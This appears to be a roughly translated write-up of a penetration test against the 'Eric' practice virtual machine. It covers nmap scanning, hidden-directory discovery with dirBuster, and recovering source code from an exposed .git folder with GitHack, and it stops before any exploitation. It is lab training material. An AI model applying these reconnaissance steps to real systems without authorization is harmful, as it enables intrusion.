Eric drone penetration testing

First, operating instructions

* Operating Environment: attack aircraft kali linux

Eric drone

Running on a VirtualBox

* Network settings: are the only host mode

* Flag directory: /root/flag.txt

/home/eric/flag.txt (this is the time to download because the author has given a specific location)

Second, the process

1. Information Collection

First look at kali address, enter ifconfig in the terminal, kali address is 192.168.56.102

Because the drone and kali is the same network mode, then use the ip nmap scans of the same network segment, to find and open drone ip port

You can see the drone ip is 192.168.56.103, and opened 80 ports and 22 ports, then we visit it in your browser

Then shows the Blog under construction, shows the blog is under construction. Then look F12, had nothing found.

And then blasting it with dirBuster, dirBuster is used to detect hidden directories and files on the web server.

See .git, admin.php, index.php and other documents, and then access it admin.php

Discovery is a login screen, but do not know the user name and password. Try a bit weak passwords blasting, it seems does not work.

After Internet search, how other people do, I noticed there is a .git not used. Internet search, then what .git, after git clone the code, it can not directly use git, but need to initialize git, it automatically creates a directory git repository needed. These files exist in the project's .git folder. .git folder after git init file in the current directory management generated a git repository folder, this contains all things necessary for the operation git.

Tools used here is GitHack. It is a .git leak using a test script, through leaked documents, reducing the reconstruction of the source code.

After using Githack scan directories, Download https://github.com/lijiejie/GitHack, download can be run directly in python environment